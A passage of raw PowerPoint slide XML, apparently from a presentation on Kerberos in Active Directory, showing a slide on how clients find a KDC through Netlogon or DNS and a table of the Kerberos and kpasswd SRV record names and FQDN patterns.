          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1431275" y="5381727"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293752" y="5686739"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170624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p:bldP spid="9" grpId="0"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="1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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Finding a KDC with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>DNS records</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Controllers are KDCs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KDCs are found via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client asks for the closest KDC as defined in the site AD configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="683568" y="2852936"/>
          <a:ext cx="7924800" cy="3150434"/>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0000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2641600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2641600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="386938">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Record</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Type</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0"/>
                        <a:t>FQDN</a:t>
                      </a:r>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b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Kdc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SRV</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_kerberos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_tcp.dc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_msdcs.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DnsDomainName</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45716" marB="45716"/>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b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KdcAtSite</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SRV</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_kerberos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_tcp.dc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_msdcs.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SiteName</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_sites.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" b="1" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DnsDomainName</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45716" marB="45716"/>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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rfc1510Kdc</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SRV</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_kerberos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_tcp.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DnsDomainName</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45716" marB="45716"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rfc1510KdcAtSite</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SRV</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_kerberos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_tcp.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SiteName</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_sites.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DnsDomainName</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45716" marB="45716"/>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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rfc1510UdpKdc</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SRV</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_kerberos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_udp.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DnsDomainName</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45716" marB="45716"/>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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rfc1510Kpwd</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SRV</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_kpasswd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_tcp.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DnsDomainName</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45716" marB="45716"/>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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rfc1510UdpKpwd</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SRV</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_kpasswd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>_udp.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DnsDomainName</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
